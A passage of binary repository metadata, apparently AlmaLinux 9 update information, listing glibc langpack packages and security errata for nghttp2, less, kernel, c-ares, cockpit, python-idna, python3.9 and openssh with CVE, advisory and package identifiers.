.2.x86_64.rpm�rglibc-langpack-lt-2.34-100.el9_4.2.x86_64.rpm�*glibc-langpack-ce-2.34-100.el9_4.2.x86_64.rpm�$glibc-langpack-sgs-2.34-100.el9_4.2.x86_64.rpm�[glibc-langpack-ik-2.34-100.el9_4.2.x86_64.rpm� glibc-langpack-bhb-2.34-100.el9_4.2.x86_64.rpm�5glibc-langpack-tcy-2.34-100.el9_4.2.x86_64.rpm�`glibc-langpack-ka-2.34-100.el9_4.2.x86_64.rpm�Mglibc-langpack-ha-2.34-100.el9_4.2.x86_64.rpm�Fglibc-langpack-unm-2.34-100.el9_4.2.x86_64.rpm�(glibc-langpack-sid-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-niu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-aa-2.34-100.el9_4.2.x86_64.rpm�=glibc-langpack-et-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mt-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ast-2.34-100.el9_4.2.x86_64.rpm�Wglibc-langpack-hy-2.34-100.el9_4.2.x86_64.rpm�5glibc-langpack-doi-2.34-100.el9_4.2.x86_64.rpm�Oglibc-langpack-xh-2.34-100.el9_4.2.x86_64.rpm�Dglibc-langpack-fr-2.34-100.el9_4.2.x86_64.rpm�glibc-common-2.34-100.el9_4.2.x86_64.rpm�!glibc-langpack-sc-2.34-100.el9_4.2.x86_64.rpm�Sglibc-langpack-hr-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-oc-2.34-100.el9_4.2.x86_64.rpm�Nglibc-langpack-hak-2.34-100.el9_4.2.x86_64.rpm�fglibc-langpack-ko-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-am-2.34-100.el9_4.2.x86_64.rpm�kglibc-langpack-ky-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-anp-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-sa-2.34-100.el9_4.2.x86_64.rpm�9glibc-langpack-the-2.34-100.el9_4.2.x86_64.rpm�Pglibc-langpack-hi-2.34-100.el9_4.2.x86_64.rpm�mglibc-langpack-lg-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mni-2.34-100.el9_4.2.x86_64.rpm�nglibc-langpack-li-2.34-100.el9_4.2.x86_64.rpm�$glibc-langpack-bo-2.34-100.el9_4.2.x86_64.rpm�8glibc-langpack-dz-2.34-100.el9_4.2.x86_64.rpm�~glibc-langpack-ml-2.34-100.el9_4.2.x86_64.rpm�Eglibc-langpack-uk-2.34-100.el9_4.2.x86_64.rpm�Kglibc-langpack-wa-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-az-2.34-100.el9_4.2.x86_64.rpm�Iglibc-langpack-ve-2.34-100.el9_4.2.x86_64.rpm�/glibc-langpack-cs-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-rw-2.34-100.el9_4.2.x86_64.rpm�(glibc-langpack-byn-2.34-100.el9_4.2.x86_64.rpm�,glibc-2.34-100.el9_4.2.x86_64.rpm�xglibc-langpack-mg-2.34-100.el9_4.2.x86_64.rpm�6glibc-langpack-te-2.34-100.el9_4.2.x86_64.rpm�|glibc-langpack-mjw-2.34-100.el9_4.2.x86_64.rpm�Yglibc-langpack-id-2.34-100.el9_4.2.x86_64.rpm�Pglibc-langpack-yi-2.34-100.el9_4.2.x86_64.rpm�Qglibc-langpack-hif-2.34-100.el9_4.2.x86_64.rpm�/libnsl-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-my-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ps-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nds-2.34-100.el9_4.2.x86_64.rpm�Rglibc-langpack-yue-2.34-100.el9_4.2.x86_64.rpm�:glibc-langpack-en-2.34-100.el9_4.2.x86_64.rpm�pglibc-langpack-ln-2.34-100.el9_4.2.x86_64.rpm�#glibc-langpack-bn-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nso-2.34-100.el9_4.2.x86_64.rpm�&glibc-langpack-brx-2.34-100.el9_4.2.x86_64.rpm�@glibc-langpack-tpi-2.34-100.el9_4.2.x86_64.rpm�Uglibc-langpack-ht-2.34-100.el9_4.2.x86_64.rpm�
glibc-langpack-nhn-2.34-100.el9_4.2.x86_64.rpm�3glibc-langpack-szl-2.34-100.el9_4.2.x86_64.rpm�qglibc-langpack-lo-2.34-100.el9_4.2.x86_64.rpm�Tglibc-langpack-zh-2.34-100.el9_4.2.x86_64.rpm�)glibc-langpack-ca-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nr-2.34-100.el9_4.2.x86_64.rpm�%glibc-langpack-shn-2.34-100.el9_4.2.x86_64.rpm�4glibc-langpack-ta-2.34-100.el9_4.2.x86_64.rpm�eglibc-langpack-kn-2.34-100.el9_4.2.x86_64.rpm�}glibc-langpack-mk-2.34-100.el9_4.2.x86_64.rpm�>glibc-langpack-eu-2.34-100.el9_4.2.x86_64.rpm�<glibc-langpack-es-2.34-100.el9_4.2.x86_64.rpm�\glibc-langpack-is-2.34-100.el9_4.2.x86_64.rpm�<glibc-langpack-tk-2.34-100.el9_4.2.x86_64.rpm�jglibc-langpack-kw-2.34-100.el9_4.2.x86_64.rpm�'glibc-langpack-si-2.34-100.el9_4.2.x86_64.rpm�6glibc-langpack-dsb-2.34-100.el9_4.2.x86_64.rpm�Gglibc-langpack-ga-2.34-100.el9_4.2.x86_64.rpm�:glibc-langpack-ti-2.34-100.el9_4.2.x86_64.rpm�!glibc-langpack-bho-2.34-100.el9_4.2.x86_64.rpm�4glibc-langpack-de-2.34-100.el9_4.2.x86_64.rpm�+glibc-langpack-chr-2.34-100.el9_4.2.x86_64.rpm�Hglibc-langpack-gd-2.34-100.el9_4.2.x86_64.rpm�bglibc-langpack-kk-2.34-100.el9_4.2.x86_64.rpm�%glibc-langpack-br-2.34-100.el9_4.2.x86_64.rpm�glibc-all-langpacks-2.34-100.el9_4.2.x86_64.rpm�gglibc-langpack-kok-2.34-100.el9_4.2.x86_64.rpm�,glibc-langpack-ckb-2.34-100.el9_4.2.x86_64.rpm�{glibc-langpack-miq-2.34-100.el9_4.2.x86_64.rpm�Zglibc-langpack-ig-2.34-100.el9_4.2.x86_64.rpm�Jglibc-langpack-vi-2.34-100.el9_4.2.x86_64.rpm�2glibc-langpack-sw-2.34-100.el9_4.2.x86_64.rpm�Aglibc-langpack-fi-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ru-2.34-100.el9_4.2.x86_64.rpm�?glibc-langpack-to-2.34-100.el9_4.2.x86_64.rpm�0glibc-langpack-csb-2.34-100.el9_4.2.x86_64.rpm�*glibc-langpack-sl-2.34-100.el9_4.2.x86_64.rpm�Rglibc-langpack-hne-2.34-100.el9_4.2.x86_64.rpm�Uglibc-langpack-zu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-raj-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-bem-2.34-100.el9_4.2.x86_64.rpm�Vglibc-langpack-hu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-sah-2.34-100.el9_4.2.x86_64.rpm�/glibc-langpack-ss-2.34-100.el9_4.2.x86_64.rpm�Qglibc-langpack-yo-2.34-100.el9_4.2.x86_64.rpm�Cglibc-langpack-tt-2.34-100.el9_4.2.x86_64.rpm�yglibc-langpack-mhr-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-om-2.34-100.el9_4.2.x86_64.rpm�Jglibc-langpack-gl-2.34-100.el9_4.2.x86_64.rpm�@glibc-langpack-ff-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-af-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nb-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ayc-2.34-100.el9_4.2.x86_64.rpm�hglibc-langpack-ks-2.34-100.el9_4.2.x86_64.rpm� glibc-langpack-sat-2.34-100.el9_4.2.x86_64.rpm�Gglibc-langpack-ur-2.34-100.el9_4.2.x86_64.rpm�3glibc-langpack-da-2.34-100.el9_4.2.x86_64.rpm�,glibc-langpack-so-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nl-2.34-100.el9_4.2.x86_64.rpm�Vglibc-minimal-langpack-2.34-100.el9_4.2.x86_64.rpm�]glibc-langpack-it-2.34-100.el9_4.2.x86_64.rpm�Bglibc-langpack-fil-2.34-100.el9_4.2.x86_64.rpm�'glibc-langpack-bs-2.34-100.el9_4.2.x86_64.rpm�,glibc-2.34-100.el9_4.2.i686.rpm�#glibc-langpack-se-2.34-100.el9_4.2.x86_64.rpm�Cglibc-langpack-fo-2.34-100.el9_4.2.x86_64.rpm�/libnsl-2.34-100.el9_4.2.i686.rpm�-glibc-gconv-extra-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-pt-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nan-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-an-2.34-100.el9_4.2.x86_64.rpm�Sglibc-langpack-yuw-2.34-100.el9_4.2.x86_64.rpm�>glibc-langpack-tn-2.34-100.el9_4.2.x86_64.rpm�Kglibc-langpack-gu-2.34-100.el9_4.2.x86_64.rpm�Hglibc-langpack-uz-2.34-100.el9_4.2.x86_64.rpm�vglibc-langpack-mai-2.34-100.el9_4.2.x86_64.rpm�.glibc-langpack-sr-2.34-100.el9_4.2.x86_64.rpm�wglibc-langpack-mfe-2.34-100.el9_4.2.x86_64.rpm�Iglibc-langpack-gez-2.34-100.el9_4.2.x86_64.rpm�;glibc-langpack-eo-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-as-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mn-2.34-100.el9_4.2.x86_64.rpm�Fglibc-langpack-fy-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ak-2.34-100.el9_4.2.x86_64.rpm�Dglibc-langpack-ug-2.34-100.el9_4.2.x86_64.rpm�_glibc-langpack-ja-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-bg-2.34-100.el9_4.2.x86_64.rpm�-glibc-gconv-extra-2.34-100.el9_4.2.i686.rpm�oglibc-langpack-lij-2.34-100.el9_4.2.x86_64.rpm�1glibc-langpack-cv-2.34-100.el9_4.2.x86_64.rpm�0glibc-langpack-st-2.34-100.el9_4.2.x86_64.rpm�Tglibc-langpack-hsb-2.34-100.el9_4.2.x86_64.rpm�"glibc-langpack-bi-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-quz-2.34-100.el9_4.2.x86_64.rpm�Nglibc-langpack-wo-2.34-100.el9_4.2.x86_64.rpm�zglibc-langpack-mi-2.34-100.el9_4.2.x86_64.rpm�9glibc-langpack-el-2.34-100.el9_4.2.x86_64.rpm�tglibc-langpack-lzh-2.34-100.el9_4.2.x86_64.rpm�^glibc-langpack-iu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-pap-2.34-100.el9_4.2.x86_64.rpm�Aglibc-langpack-tr-2.34-100.el9_4.2.x86_64.rpm�;glibc-langpack-tig-2.34-100.el9_4.2.x86_64.rpm�.glibc-langpack-crh-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-os-2.34-100.el9_4.2.x86_64.rpm�7glibc-langpack-dv-2.34-100.el9_4.2.x86_64.rpm�Xglibc-langpack-ia-2.34-100.el9_4.2.x86_64.rpm�
glibc-langpack-nn-2.34-100.el9_4.2.x86_64.rpm�Lglibc-langpack-gv-2.34-100.el9_4.2.x86_64.rpm�Mglibc-langpack-wal-2.34-100.el9_4.2.x86_64.rpm�Oglibc-langpack-he-2.34-100.el9_4.2.x86_64.rpm�	glibc-langpack-ne-2.34-100.el9_4.2.x86_64.rpm�+glibc-langpack-sm-2.34-100.el9_4.2.x86_64.rpm�Bglibc-langpack-ts-2.34-100.el9_4.2.x86_64.rpm�=glibc-langpack-tl-2.34-100.el9_4.2.x86_64.rpm�-glibc-langpack-sq-2.34-100.el9_4.2.x86_64.rpm�uglibc-langpack-mag-2.34-100.el9_4.2.x86_64.rpm�dglibc-langpack-km-2.34-100.el9_4.2.x86_64.rpm�lglibc-langpack-lb-2.34-100.el9_4.2.x86_64.rpm�iglibc-langpack-ku-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-or-2.34-100.el9_4.2.x86_64.rpm�&glibc-langpack-shs-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mr-2.34-100.el9_4.2.x86_64.rpm�)glibc-langpack-sk-2.34-100.el9_4.2.x86_64.rpm����"�Q
��IBsecurityModerate: nghttp2 security update,���mhttps://access.redhat.com/errata/RHSA-2024:3501RHSA-2024:3501RHSA-2024:3501https://access.redhat.com/security/cve/CVE-2024-28182CVE-2024-28182CVE-2024-28182https://bugzilla.redhat.com/22686392268639https://errata.almalinux.org/9/ALSA-2024-3501.htmlALSA-2024:3501ALSA-2024:3501�Z�alibnghttp2-1.43.0-5.el9_4.3.i686.rpm�Z�alibnghttp2-1.43.0-5.el9_4.3.x86_64.rpm�Z�alibnghttp2-1.43.0-5.el9_4.3.i686.rpm�Z�alibnghttp2-1.43.0-5.el9_4.3.x86_64.rpm���<�R
��MsecurityImportant: less security update,'���zhttps://access.redhat.com/errata/RHSA-2024:3513RHSA-2024:3513RHSA-2024:3513https://access.redhat.com/security/cve/CVE-2024-32487CVE-2024-32487CVE-2024-32487https://bugzilla.redhat.com/22749802274980https://errata.almalinux.org/9/ALSA-2024-3513.htmlALSA-2024:3513ALSA-2024:3513�R�8less-590-4.el9_4.x86_64.rpm�R�8less-590-4.el9_4.x86_64.rpm���U�S
�!�PBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security and bug fix update,��~�bhttps://access.redhat.com/errata/RHSA-2024:3619RHSA-2024:3619RHSA-2024:3619https://access.redhat.com/security/cve/CVE-2024-26735CVE-2024-26735CVE-2024-26735https://access.redhat.com/security/cve/CVE-2024-26993CVE-2024-26993CVE-2024-26993https://bugzilla.redhat.com/22732782273278https://bugzilla.redhat.com/22783142278314https://errata.almalinux.org/9/ALSA-2024-3619.htmlALSA-2024:3619ALSA-2024:3619Fkernel-tools-libs-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-tools-5.14.0-427.20.1.el9_4.x86_64.rpm2Fpython3-perf-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-modules-core-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-core-5.14.0-427.20.1.el9_4.x86_64.rpm1�@bpftool-7.3.0-427.20.1.el9_4.x86_64.rpm Fkernel-debug-uki-virt-5.14.0-427.20.1.el9_4.x86_64.rpm"Fkernel-uki-virt-5.14.0-427.20.1.el9_4.x86_64.rpm!Fkernel-modules-core-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-modules-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-modules-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-modules-extra-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-abi-stablelists-5.14.0-427.20.1.el9_4.noarch.rpmFkernel-core-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-modules-extra-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-tools-libs-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-tools-5.14.0-427.20.1.el9_4.x86_64.rpm2Fpython3-perf-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-modules-core-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-core-5.14.0-427.20.1.el9_4.x86_64.rpm1�@bpftool-7.3.0-427.20.1.el9_4.x86_64.rpm Fkernel-debug-uki-virt-5.14.0-427.20.1.el9_4.x86_64.rpm"Fkernel-uki-virt-5.14.0-427.20.1.el9_4.x86_64.rpm!Fkernel-modules-core-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-modules-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-modules-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-modules-extra-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-abi-stablelists-5.14.0-427.20.1.el9_4.noarch.rpmFkernel-core-5.14.0-427.20.1.el9_4.x86_64.rpmFkernel-debug-modules-extra-5.14.0-427.20.1.el9_4.x86_64.rpm����O�T
�"�qBsecurityLow: c-ares security update,�9��`�https://access.redhat.com/errata/RHSA-2024:3842RHSA-2024:3842RHSA-2024:3842https://access.redhat.com/security/cve/CVE-2024-25629CVE-2024-25629CVE-2024-25629https://bugzilla.redhat.com/22657132265713https://errata.almalinux.org/9/ALSA-2024-3842.htmlALSA-2024:3842ALSA-2024:3842��\c-ares-1.19.1-2.el9_4.i686.rpm��\c-ares-1.19.1-2.el9_4.x86_64.rpm��\c-ares-1.19.1-2.el9_4.i686.rpm��\c-ares-1.19.1-2.el9_4.x86_64.rpm����W�U
�#�tBBBBBBsecurityModerate: cockpit security update,��b�Ehttps://access.redhat.com/errata/RHSA-2024:3843RHSA-2024:3843RHSA-2024:3843https://access.redhat.com/security/cve/CVE-2024-2947CVE-2024-2947CVE-2024-2947https://bugzilla.redhat.com/22716142271614https://errata.almalinux.org/9/ALSA-2024-3843.htmlALSA-2024:3843ALSA-2024:3843�H�gcockpit-system-311.2-1.el9_4.noarch.rpm�P�gcockpit-ws-311.2-1.el9_4.x86_64.rpm�O�gcockpit-311.2-1.el9_4.x86_64.rpm�G�gcockpit-doc-311.2-1.el9_4.noarch.rpm�F�gcockpit-bridge-311.2-1.el9_4.x86_64.rpm�H�gcockpit-system-311.2-1.el9_4.noarch.rpm�P�gcockpit-ws-311.2-1.el9_4.x86_64.rpm�O�gcockpit-311.2-1.el9_4.x86_64.rpm�G�gcockpit-doc-311.2-1.el9_4.noarch.rpm�F�gcockpit-bridge-311.2-1.el9_4.x86_64.rpm����c�V
�=�<securityModerate: python-idna security update,��'�https://access.redhat.com/errata/RHSA-2024:3846RHSA-2024:3846RHSA-2024:3846https://access.redhat.com/security/cve/CVE-2024-3651CVE-2024-3651CVE-2024-3651https://bugzilla.redhat.com/22747792274779https://errata.almalinux.org/9/ALSA-2024-3846.htmlALSA-2024:3846ALSA-2024:3846�(�
python3-idna-2.10-7.el9_4.1.noarch.rpm�(�
python3-idna-2.10-7.el9_4.1.noarch.rpm����O�W
�$�~BBBsecurityImportant: python3.9 security update,'��+�https://access.redhat.com/errata/RHSA-2024:4078RHSA-2024:4078RHSA-2024:4078https://access.redhat.com/security/cve/CVE-2023-6597CVE-2023-6597CVE-2023-6597https://access.redhat.com/security/cve/CVE-2024-0450CVE-2024-0450CVE-2024-0450https://bugzilla.redhat.com/22765182276518https://bugzilla.redhat.com/22765252276525https://errata.almalinux.org/9/ALSA-2024-4078.htmlALSA-2024:4078ALSA-2024:4078-�python3-libs-3.9.18-3.el9_4.1.x86_64.rpm��python3-3.9.18-3.el9_4.1.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.1.i686.rpm-�python3-libs-3.9.18-3.el9_4.1.x86_64.rpm��python3-3.9.18-3.el9_4.1.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.1.i686.rpm����X
�%�CBBBBBBsecurityImportant: openssh security update,'��@�shttps://access.redhat.com/errata/RHSA-2024:4312RHSA-2024:4312RHSA-2024:4312https://access.redhat.com/security/cve/CVE-2024-6387CVE-2024-6387CVE-2024-6387https://bugzilla.redhat.com/22946042294604https://errata.almalinux.org/9/ALSA-2024-4312.htmlALSA-2024:4312ALSA-2024:4312�t�yopenssh-server-8.7p1-38.el9_4.1.x86_64.rpm�q�yopenssh-8.7p1-38.el9_4.1.x86_64.rpm�r�yopenssh-clients-8.7p1-38.el9_4.1.x86_64.rpm�s�yopenssh-keycat-8.7p1-38.el9_4.1.x86_64.rpm�t�yopenssh-server-8.7p1-38.el9_4.1.x86_64.rpm�q�yopenssh-8.7p1-38.el9_4.1.x86_64.rpm�r�yopenssh-clients-8.7p1-38.el9_4.1.x86_64.rpm�s�yopenssh-keycat-8.7p1-38.el9_4.1.x86_64.rpm�����Y
�&�KBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security and bug fix update,��3�https://access.redhat.com/errata/RHSA-2024:4349RHSA-2024:4349RHSA-2024:4349https://access.redhat.com/security/cve/CVE-2021-47400CVE-2021-47400CVE-2021-47400https://access.redhat.com/security/cve/CVE-2023-52626CVE-2023-52626CVE-2023-52626https://access.redhat.com/security/cve/CVE-2023-52667CVE-2023-52667CVE-2023-52667https://access.redhat.com/security/cve/CVE-2024-26801CVE-2024-26801CVE-2024-26801https://access.redhat.com/security/cve/CVE-2024-26974CVE-2024-26974CVE-2024-26974https://access.redhat.com/security/cve/CVE-2024-27393CVE-2024-27393CVE-2024-27393https://access.redhat.com/security/cve/CVE-2024-35870CVE-2024-35870CVE-2024-35870https://access.redhat.com/security/cve/CVE-2024-35960CVE-2024-35960CVE-2024-35960https://bugzilla.redhat.com/22716802271680https://bugzilla.redhat.com/22734292273429https://bugzilla.redhat.com/22783542278354https://bugzilla.redhat.com/22807452280745https://bugzilla.redhat.com/22813502281350https://bugzilla.redhat.com/22817402281740https://bugzilla.redhat.com/22819202281920https://bugzilla.redhat.com/22823362282336https://errata.almalinux.org/9/ALSA-2024-4349.htmlALSA-2024:4349ALSA-2024:4349 Gkernel-debug-uki-virt-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-modules-extra-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-tools-libs-5.14.0-427.24.1.el9_4.x86_64.rpm!Gkernel-modules-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-5.14.0-427.24.1.el9_4.x86_64.rpm"Gkernel-uki-virt-5.14.0-427.24.1.el9_4.x86_64.rpm1�Abpftool-7.3.0-427.24.1.el9_4.x86_64.rpmGkernel-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-modules-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-modules-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-tools-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-abi-stablelists-5.14.0-427.24.1.el9_4.noarch.rpm2Gpython3-perf-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-modules-extra-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-modules-5.14.0-427.24.1.el9_4.x86_64.rpm Gkernel-debug-uki-virt-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-modules-extra-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-tools-libs-5.14.0-427.24.1.el9_4.x86_64.rpm!Gkernel-modules-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-5.14.0-427.24.1.el9_4.x86_64.rpm"Gkernel-uki-virt-5.14.0-427.24.1.el9_4.x86_64.rpm1�Abpftool-7.3.0-427.24.1.el9_4.x86_64.rpmGkernel-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-modules-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-core-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-modules-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-tools-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-abi-stablelists-5.14.0-427.24.1.el9_4.noarch.rpm2Gpython3-perf-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-modules-extra-5.14.0-427.24.1.el9_4.x86_64.rpmGkernel-debug-modules-5.14.0-427.24.1.el9_4.x86_64.rpm����{�Z
�'�lBBBBBBsecurityModerate: openssh security update,��A�https://access.redhat.com/errata/RHSA-2024:4457RHSA-2024:4457RHSA-2024:4457https://access.redhat.com/security/cve/CVE-2024-6409CVE-2024-6409CVE-2024-6409https://bugzilla.redhat.com/22950852295085https://errata.almalinux.org/9/ALSA-2024-4457.htmlALSA-2024:4457ALSA-2024:4457�s�zopenssh-keycat-8.7p1-38.el9_4.4.x86_64.rpm�r�zopenssh-clients-8.7p1-38.el9_4.4.x86_64.rpm�t�zopenssh-server-8.7p1-38.el9_4.4.x86_64.rpm�q�zopenssh-8.7p1-38.el9_4.4.x86_64.rpm�s�zopenssh-keycat-8.7p1-38.el9_4.4.x86_64.rpm�r�zopenssh-clients-8.7p1-38.el9_4.4.x86_64.rpm�t�zopenssh-server-8.7p1-38.el9_4.4.x86_64.rpm�q�zopenssh-8.7p1-38.el9_4.4.x86_64.rpm��ߴ�[
�(�tBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update,'��G�$https://access.redhat.com/errata/RHSA-2024:4583RHSA-2024:4583RHSA-2024:4583https://access.redhat.com/security/cve/CVE-2021-47548CVE-2021-47548CVE-2021-47548https://access.redhat.com/security/cve/CVE-2021-47596CVE-2021-47596CVE-2021-47596https://access.redhat.com/security/cve/CVE-2022-48627CVE-2022-48627CVE-2022-48627https://access.redhat.com/security/cve/CVE-2023-52638CVE-2023-52638CVE-2023-52638https://access.redhat.com/security/cve/CVE-2024-26783CVE-2024-26783CVE-2024-26783https://access.redhat.com/security/cve/CVE-2024-26858CVE-2024-26858CVE-2024-26858https://access.redhat.com/security/cve/CVE-2024-27397CVE-2024-27397CVE-2024-27397https://access.redhat.com/security/cve/CVE-2024-27435CVE-2024-27435CVE-2024-27435https://access.redhat.com/security/cve/CVE-2024-35958CVE-2024-35958CVE-2024-35958https://access.redhat.com/security/cve/CVE-2024-36270CVE-2024-36270CVE-2024-36270https://access.redhat.com/security/cve/CVE-2024-36886CVE-2024-36886CVE-2024-36886https://access.redhat.com/security/cve/CVE-2024-36904CVE-2024-36904CVE-2024-36904https://access.redhat.com/security/cve/CVE-2024-36957CVE-2024-36957CVE-2024-36957https://access.redhat.com/security/cve/CVE-2024-38543CVE-2024-38543CVE-2024-38543https://access.redhat.com/security/cve/CVE-2024-38586CVE-2024-38586CVE-2024-38586https://access.redhat.com/security/cve/CVE-2024-38593CVE-2024-38593CVE-2024-38593https://access.redhat.com/security/cve/CVE-2024-38663CVE-2024-38663CVE-2024-38663https://bugzilla.redhat.com/22675092267509https://bugzilla.redhat.com/22730822273082https://bugzilla.redhat.com/22734662273466https://bugzilla.redhat.com/22757352275735https://bugzilla.redhat.com/22772382277238https://bugzilla.redhat.com/22804342280434https://bugzilla.redhat.com/22811312281131https://bugzilla.redhat.com/22819252281925https://bugzilla.redhat.com/22834012283401https://bugzilla.redhat.com/22845412284541https://bugzilla.redhat.com/22845812284581https://bugzilla.redhat.com/22932302293230https://bugzilla.redhat.com/22933802293380https://bugzilla.redhat.com/22934022293402https://bugzilla.redhat.com/22934562293456https://bugzilla.redhat.com/22936532293653https://bugzilla.redhat.com/22942252294225https://errata.almalinux.org/9/ALSA-2024-4583.htmlALSA-2024:4583ALSA-2024:4583Hkernel-debug-modules-extra-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-tools-5.14.0-427.26.1.el9_4.x86_64.rpm Hkernel-debug-uki-virt-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-abi-stablelists-5.14.0-427.26.1.el9_4.noarch.rpmHkernel-debug-core-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-debug-modules-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-core-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-modules-extra-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-tools-libs-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-5.14.0-427.26.1.el9_4.x86_64.rpm1�Bbpftool-7.3.0-427.26.1.el9_4.x86_64.rpmHkernel-debug-5.14.0-427.26.1.el9_4.x86_64.rpm2Hpython3-perf-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-modules-5.14.0-427.26.1.el9_4.x86_64.rpm!Hkernel-modules-core-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-debug-modules-core-5.14.0-427.26.1.el9_4.x86_64.rpm"Hkernel-uki-virt-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-debug-modules-extra-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-tools-5.14.0-427.26.1.el9_4.x86_64.rpm Hkernel-debug-uki-virt-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-abi-stablelists-5.14.0-427.26.1.el9_4.noarch.rpmHkernel-debug-core-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-debug-modules-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-core-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-modules-extra-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-tools-libs-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-5.14.0-427.26.1.el9_4.x86_64.rpm1�Bbpftool-7.3.0-427.26.1.el9_4.x86_64.rpmHkernel-debug-5.14.0-427.26.1.el9_4.x86_64.rpm2Hpython3-perf-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-modules-5.14.0-427.26.1.el9_4.x86_64.rpm!Hkernel-modules-core-5.14.0-427.26.1.el9_4.x86_64.rpmHkernel-debug-modules-core-5.14.0-427.26.1.el9_4.x86_64.rpm"Hkernel-uki-virt-5.14.0-427.26.1.el9_4.x86_64.rpm����&�\
